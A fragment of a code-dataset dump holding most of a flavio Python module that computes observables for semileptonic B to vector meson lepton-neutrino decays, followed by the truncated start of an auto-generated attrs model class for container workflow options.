V_{cb} for b->c transitions\n if q2 <= ml**2:\n return 0\n return 
4*GF/sqrt(2)*Vij\n\ndef get_angularcoeff(q2, wc_obj, par, B, V, lep):\n Jlist = [_get_angularcoeff(q2, wc_obj, par, B, V, lep, nu)\n for nu in ['e', 'mu', 'tau']]\n J = {}\n J['1s'] = sum([JJ['1s'] for JJ in Jlist])\n J['1c'] = sum([JJ['1c'] for JJ in Jlist])\n J['2s'] = sum([JJ['2s'] for JJ in Jlist])\n J['2c'] = sum([JJ['2c'] for JJ in Jlist])\n J['6s'] = sum([JJ['6s'] for JJ in Jlist])\n J['6c'] = sum([JJ['6c'] for JJ in Jlist])\n J[3] = sum([JJ[3] for JJ in Jlist])\n J[4] = sum([JJ[4] for JJ in Jlist])\n J[5] = sum([JJ[5] for JJ in Jlist])\n J[7] = sum([JJ[7] for JJ in Jlist])\n J[8] = sum([JJ[8] for JJ in Jlist])\n J[9] = sum([JJ[9] for JJ in Jlist])\n return J\n\n\n\ndef _get_angularcoeff(q2, wc_obj, par, B, V, lep, nu):\n scale = config['renormalization scale']['bvll']\n mb = running.get_mb(par, scale)\n wc = get_wceff_fccc(wc_obj, par, meson_quark[(B,V)], lep, nu, mb, scale, nf=5)\n if lep != nu and all(C == 0 for C in wc.values()):\n # if all WCs vanish, so does the AC!\n return {k: 0 for k in\n ['1s', '1c', '2s', '2c', '6s', '6c', 3, 4, 5, 7, 8, 9]}\n ml = par['m_'+lep]\n mB = par['m_'+B]\n mV = par['m_'+V]\n qi_qj = meson_quark[(B, V)]\n if qi_qj == 'bu':\n mlight = 0. # neglecting the up quark mass\n if qi_qj == 'bc':\n mlight = running.get_mc(par, scale) # this is needed for scalar contributions\n N = prefactor(q2, par, B, V, lep)\n ff = get_ff(q2, par, B, V)\n h = angular.helicity_amps_v(q2, mB, mV, mb, mlight, ml, 0, ff, wc, N)\n J = angular.angularcoeffs_general_v(h, q2, mB, mV, mb, mlight, ml, 0)\n return J\n\ndef dGdq2(J):\n r\"\"\"$q^2$-differential branching ratio in terms of angular coefficients.\"\"\"\n return 3/4. * (2 * J['1s'] + J['1c']) - 1/4. * (2 * J['2s'] + J['2c'])\n\ndef dGdq2_L(J):\n r\"\"\"$q^2$-differential branching ratio to longitudinally polarized\n vector meson in terms of angular coefficients.\"\"\"\n return 3/4. * J['1c'] - 1/4. * J['2c']\n\ndef dGdq2_T(J):\n r\"\"\"$q^2$-differential branching ratio to transversely polarized\n vector meson in terms of angular coefficients.\"\"\"\n return 3/2. * J['1s'] - 1/2. * J['2s']\n\n# For the angle-differential and binned distributions, the main idea is this:\n# while the q2-integration has to be done numerically, the angle integration is\n# trivial to do analytically as the angular dependence is given in terms of\n# trigonometric functions. So the differential distributions are given as\n# dictionaries with (q2-dependent) coefficients of these angular functions.\n# Integration (i.e. binning) in angles then merely amounts to replacing the\n# angular functions by their respective integrals.\n\ndef dG_dq2_dcosthl(J):\n r\"\"\"$\\cos\\theta_\\ell$-differential branching ratio in terms of angular\n coefficients, as dictionary of coefficients of trigonometric functions\n of $\\theta_\\ell$.\"\"\"\n return {'1': 3/8. * (J['1c'] + 2*J['1s']),\n 'c': 3/8. * (J['6c'] + 2*J['6s']),\n 'c2': 3/8. * (J['2c'] + 2*J['2s']) }\n\ndef dG_dq2_dcosthV(J):\n r\"\"\"$\\cos\\theta_V$-differential branching ratio in terms of angular\n coefficients, as dictionary of coefficients of trigonometric functions\n of $\\theta_V$.\"\"\"\n return {'c^2': -3/8. * (-3*J['1c'] + J['2c']),\n 's^2': -3/8. 
* (-3*J['1s'] + J['2s']) }\n\ndef dG_dq2_dphi(J):\n r\"\"\"$\\phi$-differential branching ratio in terms of angular\n coefficients, as dictionary of coefficients of trigonometric functions\n of $\\phi$.\"\"\"\n return {'1': 1/(8*pi) * (3*J['1c'] + 6*J['1s'] - J['2c'] - 2*J['2s']),\n 'c2': 1/(2*pi) * J[3],\n 's2': 1/(2*pi) * J[9] }\n\ndef _cos_angle_diff(costh):\n r\"\"\"Trigonometric functions for differential distributions in terms of\n $\\cos\\theta_{\\ell,V}$\"\"\"\n return {'1': 1, 'c': costh, 'c2': 2*costh**2-1, 'c^2': costh**2,\n 's^2': 1 - costh**2, 's2': 2*costh*sqrt(1-costh**2)}\n\ndef _cos_angle_int(costh):\n r\"\"\"Integrated trigonometric functions for binned distributions in terms of\n $\\cos\\theta_{\\ell,V}$\"\"\"\n return {'1': costh, 'c': costh**2/2., 'c2': 2*costh**3/3.-costh,\n 'c^2': costh**3/3., 's^2': costh - costh**3/3.,\n 's2': -2/3.*(1-costh**2)**(3/2.)}\n\ndef _angle_diff(phi):\n r\"\"\"Trigonometric functions for differential distributions in terms of\n $\\phi$\"\"\"\n return {'1': 1, 'c2': cos(2*phi), 's2': sin(2*phi)}\n\ndef _angle_int(phi):\n r\"\"\"Integrated trigonometric functions for binned distributions in terms of\n $\\phi$\"\"\"\n return {'1': phi, 'c2': sin(2*phi)/2., 's2': -cos(2*phi)/2.}\n\ndef obs_q2int(fct, wc_obj, par, B, V, lep):\n \"\"\"q2-integrated observable\"\"\"\n mB = par['m_'+B]\n mV = par['m_'+V]\n ml = par['m_'+lep]\n q2max = (mB-mV)**2\n q2min = ml**2\n def integrand(q2):\n return fct(q2)\n return flavio.math.integrate.nintegrate(integrand, q2min, q2max)\n\ndef kinem_allowed(q2, par, B, V, lep):\n \"\"\"True if q2 is in the kinematically allowed region\"\"\"\n ml = par['m_'+lep]\n mB = par['m_'+B]\n mV = par['m_'+V]\n if q2 < ml**2 or q2 > (mB-mV)**2:\n return False\n else:\n return True\n\ndef FL_diff(q2, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n return dGdq2_L(J) / dGdq2(J)\n\n\ndef FL_binned(q2min, q2max, wc_obj, par, B, V, lep):\n num = flavio.math.integrate.nintegrate(lambda q2: dBRdq2(q2, wc_obj, par, B, V, lep, A='L'), q2min, q2max)\n if num == 0:\n return 0\n denom = flavio.math.integrate.nintegrate(lambda q2: dBRdq2(q2, wc_obj, par, B, V, lep, A=None), q2min, q2max)\n return num / denom\n\ndef Itot_norm(fct_J, wc_obj, par, B, V, lep):\n def fct(q2):\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n return fct_J(J)\n num = obs_q2int(fct, wc_obj, par, B, V, lep)\n def fct_den(q2):\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n return dGdq2(J)\n den = obs_q2int(fct_den, wc_obj, par, B, V, lep)\n return num / den\n\ndef dBR_dq2_dcosthl_binned(q2, clmin, clmax, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthl(J)\n ang_min = _cos_angle_int(clmin)\n ang_max = _cos_angle_int(clmax)\n return BRfac(V) * tauB * sum(\n [y * (ang_max[a] - ang_min[a]) for a, y in dG.items()])\n\ndef BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dcosthl_binned(q2, clmin, clmax, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dcosthl(q2, cl, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthl(J)\n ang = _cos_angle_diff(cl)\n return BRfac(V) * tauB * sum(\n [y * ang[a] for a, y in dG.items()])\n\ndef dBR_dcosthl(cl, wc_obj, par, B, V, 
lep):\n def fct(q2):\n return dBR_dq2_dcosthl(q2, cl, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dcosthV_binned(q2, cVmin, cVmax, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthV(J)\n ang_min = _cos_angle_int(cVmin)\n ang_max = _cos_angle_int(cVmax)\n return BRfac(V) * tauB * sum(\n [y * (ang_max[a] - ang_min[a]) for a, y in dG.items()])\n\ndef BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dcosthV_binned(q2, cVmin, cVmax, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dcosthV(q2, cV, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthV(J)\n ang = _cos_angle_diff(cV)\n return BRfac(V) * tauB * sum(\n [y * ang[a] for a, y in dG.items()])\n\ndef dBR_dcosthV(cV, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dcosthV(q2, cV, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dphi_binned(q2, phimin, phimax, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dphi(J)\n ang_min = _angle_int(phimin)\n ang_max = _angle_int(phimax)\n return BRfac(V) * tauB * sum(\n [y * (ang_max[a] - ang_min[a]) for a, y in dG.items()])\n\ndef BR_binned_phi(phimin, phimax, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dphi_binned(q2, phimin, phimax, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\n\ndef dBR_dq2_dphi(q2, phi, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dphi(J)\n ang = _angle_diff(phi)\n return BRfac(V) * tauB * sum(\n [y * ang[a] for a, y in dG.items()])\n\ndef dBR_dphi(phi, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dphi(q2, phi, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef BRfac(V):\n if V == 'rho0' or V == 'omega':\n # factor of 1/2 for neutral rho due to rho = (uubar-ddbar)/sqrt(2)\n # and also for omega = (uubar+ddbar)/sqrt(2)\n return 1/2.\n else:\n return 1\n\ndef dBRdq2_lep(q2, wc_obj, par, B, V, lep, A):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n if A is None:\n return tauB * dGdq2(J) * BRfac(V)\n elif A == 'L':\n return tauB * dGdq2_L(J) * BRfac(V)\n elif A == 'T':\n return tauB * dGdq2_T(J) * BRfac(V)\n\n\ndef dBRdq2(q2, wc_obj, par, B, V, lep, A):\n if lep == 'l':\n # average of e and mu!\n return (dBRdq2_lep(q2, wc_obj, par, B, V, 'e', A) + dBRdq2_lep(q2, wc_obj, par, B, V, 'mu', A))/2\n else:\n return dBRdq2_lep(q2, wc_obj, par, B, V, lep, A)\n\ndef dBRdq2_function(B, V, lep, A):\n return lambda wc_obj, par, q2: dBRdq2(q2, wc_obj, par, B, V, lep, A)\n\ndef BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A):\n def integrand(q2):\n return dBRdq2(q2, wc_obj, par, B, V, lep, A)\n return flavio.math.integrate.nintegrate(integrand, q2min, q2max)\n\ndef BR_binned_function(B, V, lep, A):\n return lambda wc_obj, par, q2min, q2max: BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A)\n\ndef BR_binned_tot_function(B, V, lep, A):\n def f(wc_obj, par, q2min, q2max):\n num = 
BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A)\n if num == 0:\n return 0\n den = BR_tot(wc_obj, par, B, V, lep, A)\n return num / den\n return f\n\ndef FL_function(B, V, lep):\n return lambda wc_obj, par, q2: FL_diff(q2, wc_obj, par, B, V, lep)\n\ndef FL_binned_function(B, V, lep):\n return lambda wc_obj, par, q2min, q2max: FL_binned(q2min, q2max, wc_obj, par, B, V, lep)\n\ndef FL_tot_function(B, V, lep):\n def f(wc_obj, par):\n mB = par['m_'+B]\n mV = par['m_'+V]\n ml = par['m_'+lep]\n q2max = (mB-mV)**2\n q2min = ml**2\n return FL_binned(q2min, q2max, wc_obj, par, B, V, lep)\n return f\n\ndef FLt_tot_function(B, V, lep):\n def f(wc_obj, par):\n def fct_J(J):\n return -J['2c']\n return Itot_norm(fct_J, wc_obj, par, B, V, lep)\n return f\n\ndef AFB_tot_function(B, V, lep):\n def f(wc_obj, par):\n def fct_J(J):\n return 3 / 8 * (2 * J['6s'] + J['6c'])\n return Itot_norm(fct_J, wc_obj, par, B, V, lep)\n return f\n\ndef I3_tot_function(B, V, lep):\n def f(wc_obj, par):\n def fct_J(J):\n return J[3]\n return Itot_norm(fct_J, wc_obj, par, B, V, lep)\n return f\n\n\ndef BR_binned_costhl_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, clmin, clmax: (\n BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, 'e')\n + BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, clmin, clmax: BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, lep)\n\ndef BR_binned_costhV_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, cVmin, cVmax: (\n BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, 'e')\n + BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, cVmin, cVmax: BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, lep)\n\ndef BR_binned_phi_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, phimin, phimax: (\n BR_binned_phi(phimin, phimax, wc_obj, par, B, V, 'e')\n + BR_binned_phi(phimin, phimax, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, phimin, phimax: BR_binned_phi(phimin, phimax, wc_obj, par, B, V, lep)\n\ndef dBR_dcosthl_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, cl: (\n dBR_dcosthl(cl, wc_obj, par, B, V, 'e')\n + dBR_dcosthl(cl, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, cl: dBR_dcosthl(cl, wc_obj, par, B, V, lep)\n\ndef dBR_dcosthV_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, cV: (\n dBR_dcosthV(cV, wc_obj, par, B, V, 'e')\n + dBR_dcosthV(cV, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, cV: dBR_dcosthV(cV, wc_obj, par, B, V, lep)\n\ndef dBR_dphi_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, phi: (\n dBR_dphi(phi, wc_obj, par, B, V, 'e')\n + dBR_dphi(phi, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, phi: dBR_dphi(phi, wc_obj, par, B, V, lep)\n\ndef _BR_tot(wc_obj, par, B, V, lep, A):\n mB = par['m_'+B]\n mV = par['m_'+V]\n ml = par['m_'+lep]\n q2max = (mB-mV)**2\n q2min = ml**2\n return BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A)\n\ndef BR_tot(wc_obj, par, B, V, lep, A):\n if lep == 'l':\n # average of e and mu!\n return (_BR_tot(wc_obj, par, B, V, 'e', A)+_BR_tot(wc_obj, par, B, V, 'mu', A))/2.\n else:\n return _BR_tot(wc_obj, par, B, V, lep, A)\n\ndef BR_tot_function(B, V, lep, A):\n return lambda wc_obj, par: BR_tot(wc_obj, par, B, V, lep, A)\n\ndef BR_binned_leptonflavour(q2min, q2max, wc_obj, par, B, V, lnum, lden, A):\n num = BR_binned(q2min, q2max, wc_obj, par, B, V, lnum, A)\n if num == 0:\n return 0\n den = BR_binned(q2min, q2max, wc_obj, par, B, V, 
lden, A)\n    return num/den\n\ndef BR_tot_leptonflavour(wc_obj, par, B, V, lnum, lden, A):\n    num = BR_tot(wc_obj, par, B, V, lnum, A)\n    if num == 0:\n        return 0\n    den = BR_tot(wc_obj, par, B, V, lden, A)\n    return num/den\n\ndef BR_tot_leptonflavour_function(B, V, lnum, lden, A):\n    return lambda wc_obj, par: BR_tot_leptonflavour(wc_obj, par, B, V, lnum, lden, A)\n\ndef BR_binned_leptonflavour_function(B, V, lnum, lden, A):\n    return lambda wc_obj, par, q2min, q2max: BR_binned_leptonflavour(q2min, q2max, wc_obj, par, B, V, lnum, lden, A)\n\n\n# Observable and Prediction instances\n\n_tex = {'e': 'e', 'mu': '\mu', 'tau': r'\tau', 'l': r'\ell'}\n\n_A = {'dBR/dq2': None, 'BR': None, '<BR>
': None,\n      'dBR_L/dq2': 'L', 'BR_L': 'L', '<BR>_L': 'L',\n      'dBR_T/dq2': 'T', 'BR_T': 'T', '<BR>_T': 'T',\n      }\n_func = {'dBR/dq2': dBRdq2_function, 'BR': BR_tot_function, '<BR>
': BR_binned_function,\n         'dBR_L/dq2': dBRdq2_function, 'BR_L': BR_tot_function, '<BR>_L': BR_binned_function,\n         'dBR_T/dq2': dBRdq2_function, 'BR_T': BR_tot_function, '<BR>_T': BR_binned_function,\n         '<BR>
/<cl>': BR_binned_costhl_function,\n         '<BR>
/<cV>': BR_binned_costhV_function,\n         '<BR>
/<phi>': BR_binned_phi_function,\n         'dBR/dcl': dBR_dcosthl_function,\n         'dBR/dcV': dBR_dcosthV_function,\n         'dBR/dphi': dBR_dphi_function,\n         'FL': FL_function,\n         '<FL>': FL_binned_function,\n         'FLtot': FL_tot_function,\n         'FLttot': FLt_tot_function,\n         'AFBtot': AFB_tot_function,\n         'I3tot': I3_tot_function,\n         }\n_desc = {'dBR/dq2': r'$q^2$-differential', 'BR': 'Total', '<BR>
': '$q^2$-binned',\n         'dBR_L/dq2': 'Differential longitudinal', 'BR_L': 'Total longitudinal', '<BR>_L': 'Binned longitudinal',\n         'dBR_T/dq2': 'Differential transverse', 'BR_T': 'Total transverse', '<BR>_T': 'Binned transverse',\n         '<BR>
/<cl>': r'$\\cos\\theta_l$-binned',\n         '<BR>
/<cV>': r'$\\cos\\theta_V$-binned',\n         '<BR>
/<phi>': r'$\\phi$-binned',\n         'dBR/dcl': r'$\\cos\\theta_l$-differential',\n         'dBR/dcV':r'$\\cos\\theta_V$-differential ',\n         'dBR/dphi': r'$\\phi$-differential',\n         'FL': r'Differential longitudinal polarization fraction',\n         '<FL>': r'Binned longitudinal polarization fraction',\n         'FLtot': r'Total longitudinal polarization fraction',\n         'FLttot': r'Total longitudinal polarization fraction',\n         'AFBtot': r'Total forward-backward asymmetry',\n         'I3tot': r'$q^2$-integrated angular coefficient $I_3$',\n         }\n_tex_br = {'dBR/dq2': r'\\frac{d\\text{BR}}{dq^2}', 'BR': r'\\text{BR}', '<BR>
': r'\\langle\\text{BR}\\rangle',\n           'dBR_L/dq2': r'\\frac{d\\text{BR}_L}{dq^2}', 'BR_L': r'\\text{BR}_L', '<BR>_L': r'\\langle\\text{BR}_L\\rangle',\n           'dBR_T/dq2': r'\\frac{d\\text{BR}_T}{dq^2}', 'BR_T': r'\\text{BR}_T', '<BR>_T': r'\\langle\\text{BR}_T\\rangle',\n           '<BR>
/<cl>': r'\\langle\\text{BR}\\rangle/\\Delta\\cos\\theta_l',\n           '<BR>
/<cV>': r'\\langle\\text{BR}\\rangle/\\Delta\\cos\\theta_V',\n           '<BR>
/<phi>': r'\\langle\\text{BR}\\rangle/\\Delta\\phi',\n           'dBR/dcl': r'\\frac{d\\text{BR}}{d\\cos\\theta_l}',\n           'dBR/dcV': r'\\frac{d\\text{BR}}{d\\cos\\theta_V}',\n           'dBR/dphi': r'\\frac{d\\text{BR}}{d\\phi}',\n           'FL': r'F_L',\n           '<FL>': r'\\langle F_L\\rangle',\n           'FLtot': r'F_L',\n           'FLttot': r'\\widetilde{F}_L',\n           'AFBtot': r'A_\\text{FB}',\n           'I3tot': r'I_3',\n           }\n_args = {'dBR/dq2': ['q2'], 'BR': None, '<BR>
': ['q2min', 'q2max'],\n         'dBR_L/dq2': ['q2'], 'BR_L': None, '<BR>_L': ['q2min', 'q2max'],\n         'dBR_T/dq2': ['q2'], 'BR_T': None, '<BR>_T': ['q2min', 'q2max'],\n         '<BR>
/<cl>': ['clmin', 'clmax'],\n         '<BR>
/<cV>': ['cVmin', 'cVmax'],\n         '<BR>
/<phi>': ['phimin', 'phimax'],\n         'dBR/dcl': ['cl'],\n         'dBR/dcV': ['cV'],\n         'dBR/dphi': ['phi'],\n         'FL': ['q2'],\n         '<FL>': ['q2min', 'q2max'],\n         'FLtot': None,\n         'FLttot': None,\n         'AFBtot': None,\n         'I3tot': None,\n         }\n_hadr = {\n'B0->D*': {'tex': r\"B^0\\to D^{\\ast -}\", 'B': 'B0', 'V': 'D*+', },\n'B+->D*': {'tex': r\"B^+\\to D^{\\ast 0}\", 'B': 'B+', 'V': 'D*0', },\n'B0->rho': {'tex': r\"B^0\\to \\rho^-\", 'B': 'B0', 'V': 'rho+', },\n'B+->rho': {'tex': r\"B^+\\to \\rho^0\", 'B': 'B+', 'V': 'rho0', },\n'B+->omega': {'tex': r\"B^+\\to \\omega \", 'B': 'B+', 'V': 'omega', },\n'Bs->K*': {'tex': r\"B_s\\to K^{* -} \", 'B': 'Bs', 'V': 'K*+', },\n}\n# for LF ratios we don't distinguish B+ and B0 (but take B0 because we have to choose sth)\n_hadr_l = {\n'B->D*': {'tex': r\"B\\to D^{\\ast}\", 'B': 'B0', 'V': 'D*+', 'decays': ['B0->D*', 'B+->D*'],},\n'B->rho': {'tex': r\"B\\to \\rho\", 'B': 'B0', 'V': 'rho+', 'decays': ['B0->rho', 'B+->rho'],},\n'B+->omega': {'tex': r\"B^+\\to \\omega \", 'B': 'B+', 'V': 'omega', 'decays': ['B+->omega'],},\n'Bs->K*': {'tex': r\"B_s\\to K^{* -} \", 'B': 'Bs', 'V': 'K*+', 'decays': ['Bs->K*'],},\n}\n\n_process_taxonomy = r'Process :: $b$ hadron decays :: Semi-leptonic tree-level decays :: $B\\to V\\ell\\nu$ :: $'\n\nfor l in ['e', 'mu', 'tau', 'l']:\n    for br in ['dBR/dq2', 'BR', '<BR>
',\n               'dBR_L/dq2', 'BR_L', '<BR>_L',\n               'dBR_T/dq2', 'BR_T', '<BR>_T',\n               '<BR>
/<cl>', '<BR>
/<cV>', '<BR>
/<phi>',\n               'dBR/dcl', 'dBR/dcV', 'dBR/dphi',\n               '<FL>', 'FL', 'FLtot', 'FLttot', 'AFBtot', 'I3tot']:\n        for M in _hadr.keys():\n            _process_tex = _hadr[M]['tex']+_tex[l]+r\"^+\\nu_\"+_tex[l]\n            _obs_name = br + \"(\"+M+l+\"nu)\"\n            _obs = Observable(_obs_name)\n            _obs.set_description(_desc[br] + r\" branching ratio of $\" + _process_tex + \"$\")\n            _obs.tex = r'$' + _tex_br[br] + r\"(\" +_process_tex + \")$\"\n            _obs.arguments = _args[br]\n            _obs.add_taxonomy(_process_taxonomy + _process_tex + r'$')\n            if br in _A:\n                # for dBR/dq2, need to distinguish between total, L, and T\n                Prediction(_obs_name, _func[br](_hadr[M]['B'], _hadr[M]['V'], l, A=_A[br]))\n            else:\n                # for other observables not\n                Prediction(_obs_name, _func[br](_hadr[M]['B'], _hadr[M]['V'], l))\n\n\n# Lepton flavour ratios\nfor l in [('mu','e'), ('tau','mu'), ('tau', 'l')]:\n    for M in _hadr_l.keys():\n\n        # binned ratio of BRs\n        _obs_name = \"<R\"+l[0]+l[1]+\">(\"+M+\"lnu)\"\n        _obs = Observable(name=_obs_name, arguments=['q2min', 'q2max'])\n        _obs.set_description(r\"Ratio of partial branching ratios of $\" + _hadr_l[M]['tex'] +_tex[l[0]]+r\"^+ \\nu_\"+_tex[l[0]]+r\"$\" + \" and \" + r\"$\" + _hadr_l[M]['tex'] +_tex[l[1]]+r\"^+ \\nu_\"+_tex[l[1]]+r\"$\")\n        _obs.tex = r\"$\\langle R_{\" + _tex[l[0]] + ' ' + _tex[l[1]] + r\"} \\rangle(\" + _hadr_l[M]['tex'] + r\"\\ell^+\\nu)$\"\n        for li in l:\n            for N in _hadr_l[M]['decays']:\n                # add taxonomy for both processes (e.g. B->Venu and B->Vmunu) and for charged and neutral\n                _obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] + _tex[li]+r\"^+\\nu_\"+_tex[li]+r\"$\")\n        Prediction(_obs_name, BR_binned_leptonflavour_function(_hadr_l[M]['B'], _hadr_l[M]['V'], l[0], l[1], A=None))\n\n        # ratio of total BRs\n        _obs_name = \"R\"+l[0]+l[1]+\"(\"+M+\"lnu)\"\n        _obs = Observable(name=_obs_name)\n        _obs.set_description(r\"Ratio of total branching ratios of $\" + _hadr_l[M]['tex'] +_tex[l[0]]+r\"^+ \\nu_\"+_tex[l[0]]+r\"$\" + \" and \" + r\"$\" + _hadr_l[M]['tex'] +_tex[l[1]]+r\"^+ \\nu_\"+_tex[l[1]]+r\"$\")\n        _obs.tex = r\"$R_{\" + _tex[l[0]] + ' ' + _tex[l[1]] + r\"}(\" + _hadr_l[M]['tex'] + r\"\\ell^+\\nu)$\"\n        for li in l:\n            for N in _hadr_l[M]['decays']:\n                # add taxonomy for both processes (e.g. B->Venu and B->Vmunu) and for charged and neutral\n                _obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] +_tex[li]+r\"^+\\nu_\"+_tex[li]+r\"$\")\n        Prediction(_obs_name, BR_tot_leptonflavour_function(_hadr_l[M]['B'], _hadr_l[M]['V'], l[0], l[1], A=None))\n\n\n# B->D*taunu normalized binned BR\n_obs_name = \"<BR>
/BR(B->D*taunu)\"\n_obs = Observable(name=_obs_name, arguments=['q2min', 'q2max'])\n_obs.set_description(r\"Relative partial branching ratio of $B\\to D^\\ast\\tau^+\\nu$\")\n_obs.tex = r\"$\\frac{\\langle \\text{BR} \\rangle}{\\text{BR}}(B\\to D^\\ast\\tau^+\\nu)$\"\nfor M in ['B+->D*', 'B0->D*']:\n _process_tex = _hadr[M]['tex'] + r\"\\tau^+\\nu\"\n _obs.add_taxonomy(_process_taxonomy + _process_tex + r\"$\")\nPrediction(_obs_name, BR_binned_tot_function('B0', 'D*+', 'tau', A=None))\n","repo_name":"flav-io/flavio","sub_path":"flavio/physics/bdecays/bvlnu.py","file_name":"bvlnu.py","file_ext":"py","file_size_in_byte":24633,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"5"} +{"seq_id":"15358386644","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union, cast\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.resource_memory_t import ResourceMemoryT\n\n\nT = TypeVar(\"T\", bound=\"BasicWorkflowOptsT\")\n\n\n@attr.s(auto_attribs=True)\nclass BasicWorkflowOptsT:\n \"\"\"\n Example:\n {'command': ['Odit dolorum nulla quo.', 'Asperiores temporibus.', 'Ut voluptatem.'], 'cpu': {'limit': 'Quidem\n nulla quae provident dolor amet nulla.', 'request': 'Et aut autem deserunt sit architecto.'}, 'image': 'Est esse\n voluptas consectetur quia.', 'memory': {'limit': 'Quidem nulla quae provident dolor amet nulla.', 'request': 'Et\n aut autem deserunt sit architecto.'}}\n\n Attributes:\n command (Union[Unset, List[str]]): Command to start the container - needed for some container runtimes Example:\n ['Sed error id et cupiditate.', 'Ratione qui amet reiciendis debitis.', 'Reprehenderit voluptate nostrum\n quibusdam quia.', 'Neque sapiente commodi dolorem.'].\n cpu (Union[Unset, ResourceMemoryT]): See\n and https://kubernetes.io/docs/reference/kubernetes-api/common-definitions/quantity/ for units Example:\n {'limit': 'Molestiae et ex hic aut dicta dolorem.', 'request': 'Voluptas odit.'}.\n image (Union[Unset, str]): container image name Example: Reprehenderit ratione accusamus maxime iusto iste..\n memory (Union[Unset, ResourceMemoryT]): See\n and https://kubernetes.io/docs/reference/kubernetes-api/common-definitions/quantity/ for units Example:\n {'limit': 'Molestiae et ex hic aut dicta dolorem.', 'request': 'Voluptas odit.'}.\n \"\"\"\n\n command: Union[Unset, List[str]] = UNSET\n cpu: Union[Unset, \"ResourceMemoryT\"] = UNSET\n image: Union[Unset, str] = UNSET\n memory: Union[Unset, \"ResourceMemoryT\"] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n command: Union[Unset, List[str]] = UNSET\n if not isinstance(self.command, Unset):\n command = self.command\n\n cpu: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.cpu, Unset):\n cpu = self.cpu.to_dict()\n\n image = self.image\n memory: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.memory, Unset):\n memory = self.memory.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if command is not UNSET:\n field_dict[\"command\"] = command\n if cpu is not UNSET:\n field_dict[\"cpu\"] = cpu\n if image is not UNSET:\n field_dict[\"image\"] = image\n if memory is not UNSET:\n field_dict[\"memory\"] = memory\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.resource_memory_t import ResourceMemoryT\n\n d = src_dict.copy()\n 
